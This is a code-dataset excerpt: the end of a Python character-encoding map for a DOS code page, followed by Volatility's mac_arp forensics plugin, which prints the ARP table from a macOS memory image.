u'\xb3' # 0x00fc -> SUPERSCRIPT THREE
u'\xb2' # 0x00fd -> SUPERSCRIPT TWO
u'\u25a0' # 0x00fe -> BLACK SQUARE
u'\xa0' # 0x00ff -> NO-BREAK SPACE
)
### Encoding Map
encoding_map = {
0x0000: 0x0000, # NULL
0x0001: 0x0001, # START OF HEADING
0x0002: 0x0002, # START OF TEXT
0x0003: 0x0003, # END OF TEXT
0x0004: 0x0004, # END OF TRANSMISSION
0x0005: 0x0005, # ENQUIRY
0x0006: 0x0006, # ACKNOWLEDGE
0x0007: 0x0007, # BELL
0x0008: 0x0008, # BACKSPACE
0x0009: 0x0009, # HORIZONTAL TABULATION
0x000a: 0x000a, # LINE FEED
0x000b: 0x000b, # VERTICAL TABULATION
0x000c: 0x000c, # FORM FEED
0x000d: 0x000d, # CARRIAGE RETURN
0x000e: 0x000e, # SHIFT OUT
0x000f: 0x000f, # SHIFT IN
0x0010: 0x0010, # DATA LINK ESCAPE
0x0011: 0x0011, # DEVICE CONTROL ONE
0x0012: 0x0012, # DEVICE CONTROL TWO
0x0013: 0x0013, # DEVICE CONTROL THREE
0x0014: 0x0014, # DEVICE CONTROL FOUR
0x0015: 0x0015, # NEGATIVE ACKNOWLEDGE
0x0016: 0x0016, # SYNCHRONOUS IDLE
0x0017: 0x0017, # END OF TRANSMISSION BLOCK
0x0018: 0x0018, # CANCEL
0x0019: 0x0019, # END OF MEDIUM
0x001a: 0x001a, # SUBSTITUTE
0x001b: 0x001b, # ESCAPE
0x001c: 0x001c, # FILE SEPARATOR
0x001d: 0x001d, # GROUP SEPARATOR
0x001e: 0x001e, # RECORD SEPARATOR
0x001f: 0x001f, # UNIT SEPARATOR
0x0020: 0x0020, # SPACE
0x0021: 0x0021, # EXCLAMATION MARK
0x0022: 0x0022, # QUOTATION MARK
0x0023: 0x0023, # NUMBER SIGN
0x0024: 0x0024, # DOLLAR SIGN
0x0025: 0x0025, # PERCENT SIGN
0x0026: 0x0026, # AMPERSAND
0x0027: 0x0027, # APOSTROPHE
0x0028: 0x0028, # LEFT PARENTHESIS
0x0029: 0x0029, # RIGHT PARENTHESIS
0x002a: 0x002a, # ASTERISK
0x002b: 0x002b, # PLUS SIGN
0x002c: 0x002c, # COMMA
0x002d: 0x002d, # HYPHEN-MINUS
0x002e: 0x002e, # FULL STOP
0x002f: 0x002f, # SOLIDUS
0x0030: 0x0030, # DIGIT ZERO
0x0031: 0x0031, # DIGIT ONE
0x0032: 0x0032, # DIGIT TWO
0x0033: 0x0033, # DIGIT THREE
0x0034: 0x0034, # DIGIT FOUR
0x0035: 0x0035, # DIGIT FIVE
0x0036: 0x0036, # DIGIT SIX
0x0037: 0x0037, # DIGIT SEVEN
0x0038: 0x0038, # DIGIT EIGHT
0x0039: 0x0039, # DIGIT NINE
0x003a: 0x003a, # COLON
0x003b: 0x003b, # SEMICOLON
0x003c: 0x003c, # LESS-THAN SIGN
0x003d: 0x003d, # EQUALS SIGN
0x003e: 0x003e, # GREATER-THAN SIGN
0x003f: 0x003f, # QUESTION MARK
0x0040: 0x0040, # COMMERCIAL AT
0x0041: 0x0041, # LATIN CAPITAL LETTER A
0x0042: 0x0042, # LATIN CAPITAL LETTER B
0x0043: 0x0043, # LATIN CAPITAL LETTER C
0x0044: 0x0044, # LATIN CAPITAL LETTER D
0x0045: 0x0045, # LATIN CAPITAL LETTER E
0x0046: 0x0046, # LATIN CAPITAL LETTER F
0x0047: 0x0047, # LATIN CAPITAL LETTER G
0x0048: 0x0048, # LATIN CAPITAL LETTER H
0x0049: 0x0049, # LATIN CAPITAL LETTER I
0x004a: 0x004a, # LATIN CAPITAL LETTER J
0x004b: 0x004b, # LATIN CAPITAL LETTER K
0x004c: 0x004c, # LATIN CAPITAL LETTER L
0x004d: 0x004d, # LATIN CAPITAL LETTER M
0x004e: 0x004e, # LATIN CAPITAL LETTER N
0x004f: 0x004f, # LATIN CAPITAL LETTER O
0x0050: 0x0050, # LATIN CAPITAL LETTER P
0x0051: 0x0051, # LATIN CAPITAL LETTER Q
0x0052: 0x0052, # LATIN CAPITAL LETTER R
0x0053: 0x0053, # LATIN CAPITAL LETTER S
0x0054: 0x0054, # LATIN CAPITAL LETTER T
0x0055: 0x0055, # LATIN CAPITAL LETTER U
0x0056: 0x0056, # LATIN CAPITAL LETTER V
0x0057: 0x0057, # LATIN CAPITAL LETTER W
0x0058: 0x0058, # LATIN CAPITAL LETTER X
0x0059: 0x0059, # LATIN CAPITAL LETTER Y
0x005a: 0x005a, # LATIN CAPITAL LETTER Z
0x005b: 0x005b, # LEFT SQUARE BRACKET
0x005c: 0x005c, # REVERSE SOLIDUS
0x005d: 0x005d, # RIGHT SQUARE BRACKET
0x005e: 0x005e, # CIRCUMFLEX ACCENT
0x005f: 0x005f, # LOW LINE
0x0060: 0x0060, # GRAVE ACCENT
0x0061: 0x0061, # LATIN SMALL LETTER A
0x0062: 0x0062, # LATIN SMALL LETTER B
0x0063: 0x0063, # LATIN SMALL LETTER C
0x0064: 0x0064, # LATIN SMALL LETTER D
0x0065: 0x0065, # LATIN SMALL LETTER E
0x0066: 0x0066, # LATIN SMALL LETTER F
0x0067: 0x0067, # LATIN SMALL LETTER G
0x0068: 0x0068, # LATIN SMALL LETTER H
0x0069: 0x0069, # LATIN SMALL LETTER I
0x006a: 0x006a, # LATIN SMALL LETTER J
0x006b: 0x006b, # LATIN SMALL LETTER K
0x006c: 0x006c, # LATIN SMALL LETTER L
0x006d: 0x006d, # LATIN SMALL LETTER M
0x006e: 0x006e, # LATIN SMALL LETTER N
0x006f: 0x006f, # LATIN SMALL LETTER O
0x0070: 0x0070, # LATIN SMALL LETTER P
0x0071: 0x0071, # LATIN SMALL LETTER Q
0x0072: 0x0072, # LATIN SMALL LETTER R
0x0073: 0x0073, # LATIN SMALL LETTER S
0x0074: 0x0074, # LATIN SMALL LETTER T
0x0075: 0x0075, # LATIN SMALL LETTER U
0x0076: 0x0076, # LATIN SMALL LETTER V
0x0077: 0x0077, # LATIN SMALL LETTER W
0x0078: 0x0078, # LATIN SMALL LETTER X
0x0079: 0x0079, # LATIN SMALL LETTER Y
0x007a: 0x007a, # LATIN SMALL LETTER Z
0x007b: 0x007b, # LEFT CURLY BRACKET
0x007c: 0x007c, # VERTICAL LINE
0x007d: 0x007d, # RIGHT CURLY BRACKET
0x007e: 0x007e, # TILDE
0x007f: 0x007f, # DELETE
0x00a0: 0x00ff, # NO-BREAK SPACE
0x00a2: 0x0096, # CENT SIGN
0x00a3: 0x009c, # POUND SIGN
0x00a4: 0x009f, # CURRENCY SIGN
0x00a6: 0x00a7, # BROKEN BAR
0x00a7: 0x00f5, # SECTION SIGN
0x00a9: 0x00a8, # COPYRIGHT SIGN
0x00ab: 0x00ae, # LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
0x00ac: 0x00aa, # NOT SIGN
0x00ad: 0x00f0, # SOFT HYPHEN
0x00ae: 0x00a9, # REGISTERED SIGN
0x00b0: 0x00f8, # DEGREE SIGN
0x00b1: 0x00f1, # PLUS-MINUS SIGN
0x00b2: 0x00fd, # SUPERSCRIPT TWO
0x00b3: 0x00fc, # SUPERSCRIPT THREE
0x00b5: 0x00e6, # MICRO SIGN
0x00b6: 0x00f4, # PILCROW SIGN
0x00b7: 0x00fa, # MIDDLE DOT
0x00b9: 0x00fb, # SUPERSCRIPT ONE
0x00bb: 0x00af, # RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
0x00bc: 0x00ac, # VULGAR FRACTION ONE QUARTER
0x00bd: 0x00ab, # VULGAR FRACTION ONE HALF
0x00be: 0x00f3, # VULGAR FRACTION THREE QUARTERS
0x00c4: 0x008e, # LATIN CAPITAL LETTER A WITH DIAERESIS
0x00c5: 0x008f, # LATIN CAPITAL LETTER A WITH RING ABOVE
0x00c6: 0x0092, # LATIN CAPITAL LIGATURE AE
0x00c9: 0x0090, # LATIN CAPITAL LETTER E WITH ACUTE
0x00d3: 0x00e0, # LATIN CAPITAL LETTER O WITH ACUTE
0x00d5: 0x00e5, # LATIN CAPITAL LETTER O WITH TILDE
0x00d6: 0x0099, # LATIN CAPITAL LETTER O WITH DIAERESIS
0x00d7: 0x009e, # MULTIPLICATION SIGN
0x00d8: 0x009d, # LATIN CAPITAL LETTER O WITH STROKE
0x00dc: 0x009a, # LATIN CAPITAL LETTER U WITH DIAERESIS
0x00df: 0x00e1, # LATIN SMALL LETTER SHARP S (GERMAN)
0x00e4: 0x0084, # LATIN SMALL LETTER A WITH DIAERESIS
0x00e5: 0x0086, # LATIN SMALL LETTER A WITH RING ABOVE
0x00e6: 0x0091, # LATIN SMALL LIGATURE AE
0x00e9: 0x0082, # LATIN SMALL LETTER E WITH ACUTE
0x00f3: 0x00a2, # LATIN SMALL LETTER O WITH ACUTE
0x00f5: 0x00e4, # LATIN SMALL LETTER O WITH TILDE
0x00f6: 0x0094, # LATIN SMALL LETTER O WITH DIAERESIS
0x00f7: 0x00f6, # DIVISION SIGN
0x00f8: 0x009b, # LATIN SMALL LETTER O WITH STROKE
0x00fc: 0x0081, # LATIN SMALL LETTER U WITH DIAERESIS
0x0100: 0x00a0, # LATIN CAPITAL LETTER A WITH MACRON
0x0101: 0x0083, # LATIN SMALL LETTER A WITH MACRON
0x0104: 0x00b5, # LATIN CAPITAL LETTER A WITH OGONEK
0x0105: 0x00d0, # LATIN SMALL LETTER A WITH OGONEK
0x0106: 0x0080, # LATIN CAPITAL LETTER C WITH ACUTE
0x0107: 0x0087, # LATIN SMALL LETTER C WITH ACUTE
0x010c: 0x00b6, # LATIN CAPITAL LETTER C WITH CARON
0x010d: 0x00d1, # LATIN SMALL LETTER C WITH CARON
0x0112: 0x00ed, # LATIN CAPITAL LETTER E WITH MACRON
0x0113: 0x0089, # LATIN SMALL LETTER E WITH MACRON
0x0116: 0x00b8, # LATIN CAPITAL LETTER E WITH DOT ABOVE
0x0117: 0x00d3, # LATIN SMALL LETTER E WITH DOT ABOVE
0x0118: 0x00b7, # LATIN CAPITAL LETTER E WITH OGONEK
0x0119: 0x00d2, # LATIN SMALL LETTER E WITH OGONEK
0x0122: 0x0095, # LATIN CAPITAL LETTER G WITH CEDILLA
0x0123: 0x0085, # LATIN SMALL LETTER G WITH CEDILLA
0x012a: 0x00a1, # LATIN CAPITAL LETTER I WITH MACRON
0x012b: 0x008c, # LATIN SMALL LETTER I WITH MACRON
0x012e: 0x00bd, # LATIN CAPITAL LETTER I WITH OGONEK
0x012f: 0x00d4, # LATIN SMALL LETTER I WITH OGONEK
0x0136: 0x00e8, # LATIN CAPITAL LETTER K WITH CEDILLA
0x0137: 0x00e9, # LATIN SMALL LETTER K WITH CEDILLA
0x013b: 0x00ea, # LATIN CAPITAL LETTER L WITH CEDILLA
0x013c: 0x00eb, # LATIN SMALL LETTER L WITH CEDILLA
0x0141: 0x00ad, # LATIN CAPITAL LETTER L WITH STROKE
0x0142: 0x0088, # LATIN SMALL LETTER L WITH STROKE
0x0143: 0x00e3, # LATIN CAPITAL LETTER N WITH ACUTE
0x0144: 0x00e7, # LATIN SMALL LETTER N WITH ACUTE
0x0145: 0x00ee, # LATIN CAPITAL LETTER N WITH CEDILLA
0x0146: 0x00ec, # LATIN SMALL LETTER N WITH CEDILLA
0x014c: 0x00e2, # LATIN CAPITAL LETTER O WITH MACRON
0x014d: 0x0093, # LATIN SMALL LETTER O WITH MACRON
0x0156: 0x008a, # LATIN CAPITAL LETTER R WITH CEDILLA
0x0157: 0x008b, # LATIN SMALL LETTER R WITH CEDILLA
0x015a: 0x0097, # LATIN CAPITAL LETTER S WITH ACUTE
0x015b: 0x0098, # LATIN SMALL LETTER S WITH ACUTE
0x0160: 0x00be, # LATIN CAPITAL LETTER S WITH CARON
0x0161: 0x00d5, # LATIN SMALL LETTER S WITH CARON
0x016a: 0x00c7, # LATIN CAPITAL LETTER U WITH MACRON
0x016b: 0x00d7, # LATIN SMALL LETTER U WITH MACRON
0x0172: 0x00c6, # LATIN CAPITAL LETTER U WITH OGONEK
0x0173: 0x00d6, # LATIN SMALL LETTER U WITH OGONEK
0x0179: 0x008d, # LATIN CAPITAL LETTER Z WITH ACUTE
0x017a: 0x00a5, # LATIN SMALL LETTER Z WITH ACUTE
0x017b: 0x00a3, # LATIN CAPITAL LETTER Z WITH DOT ABOVE
0x017c: 0x00a4, # LATIN SMALL LETTER Z WITH DOT ABOVE
0x017d: 0x00cf, # LATIN CAPITAL LETTER Z WITH CARON
0x017e: 0x00d8, # LATIN SMALL LETTER Z WITH CARON
0x2019: 0x00ef, # RIGHT SINGLE QUOTATION MARK
0x201c: 0x00f2, # LEFT DOUBLE QUOTATION MARK
0x201d: 0x00a6, # RIGHT DOUBLE QUOTATION MARK
0x201e: 0x00f7, # DOUBLE LOW-9 QUOTATION MARK
0x2219: 0x00f9, # BULLET OPERATOR
0x2500: 0x00c4, # BOX DRAWINGS LIGHT HORIZONTAL
0x2502: 0x00b3, # BOX DRAWINGS LIGHT VERTICAL
0x250c: 0x00da, # BOX DRAWINGS LIGHT DOWN AND RIGHT
0x2510: 0x00bf, # BOX DRAWINGS LIGHT DOWN AND LEFT
0x2514: 0x00c0, # BOX DRAWINGS LIGHT UP AND RIGHT
0x2518: 0x00d9, # BOX DRAWINGS LIGHT UP AND LEFT
0x251c: 0x00c3, # BOX DRAWINGS LIGHT VERTICAL AND RIGHT
0x2524: 0x00b4, # BOX DRAWINGS LIGHT VERTICAL AND LEFT
0x252c: 0x00c2, # BOX DRAWINGS LIGHT DOWN AND HORIZONTAL
0x2534: 0x00c1, # BOX DRAWINGS LIGHT UP AND HORIZONTAL
0x253c: 0x00c5, # BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL
0x2550: 0x00cd, # BOX DRAWINGS DOUBLE HORIZONTAL
0x2551: 0x00ba, # BOX DRAWINGS DOUBLE VERTICAL
0x2554: 0x00c9, # BOX DRAWINGS DOUBLE DOWN AND RIGHT
0x2557: 0x00bb, # BOX DRAWINGS DOUBLE DOWN AND LEFT
0x255a: 0x00c8, # BOX DRAWINGS DOUBLE UP AND RIGHT
0x255d: 0x00bc, # BOX DRAWINGS DOUBLE UP AND LEFT
0x2560: 0x00cc, # BOX DRAWINGS DOUBLE VERTICAL AND RIGHT
0x2563: 0x00b9, # BOX DRAWINGS DOUBLE VERTICAL AND LEFT
0x2566: 0x00cb, # BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL
0x2569: 0x00ca, # BOX DRAWINGS DOUBLE UP AND HORIZONTAL
0x256c: 0x00ce, # BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL
0x2580: 0x00df, # UPPER HALF BLOCK
0x2584: 0x00dc, # LOWER HALF BLOCK
0x2588: 0x00db, # FULL BLOCK
0x258c: 0x00dd, # LEFT HALF BLOCK
0x2590: 0x00de, # RIGHT HALF BLOCK
0x2591: 0x00b0, # LIGHT SHADE
0x2592: 0x00b1, # MEDIUM SHADE
0x2593: 0x00b2, # DARK SHADE
0x25a0: 0x00fe, # BLACK SQUARE
}
| gpl-3.0 | 3,162,141,460,249,367,600 | 48.830703 | 103 | 0.593469 | false |
StephaneP/volatility | volatility/plugins/mac/arp.py | 58 | 1398 | # Volatility
# Copyright (C) 2007-2013 Volatility Foundation
#
# This file is part of Volatility.
#
# Volatility is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Volatility is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Volatility. If not, see <http://www.gnu.org/licenses/>.
#
"""
@author: Andrew Case
@license: GNU General Public License 2.0
@contact: atcuno@gmail.com
@organization:
"""
import volatility.obj as obj
import volatility.plugins.mac.common as common
import volatility.plugins.mac.route as route
class mac_arp(route.mac_route):
""" Prints the arp table """
def calculate(self):
common.set_plugin_members(self)
arp_addr = self.addr_space.profile.get_symbol("_llinfo_arp")
ptr = obj.Object("Pointer", offset = arp_addr, vm = self.addr_space)
ent = ptr.dereference_as("llinfo_arp")
while ent:
yield ent.la_rt
ent = ent.la_le.le_next
| gpl-2.0 | 5,507,235,411,612,354,000 | 31.511628 | 76 | 0.700286 | false |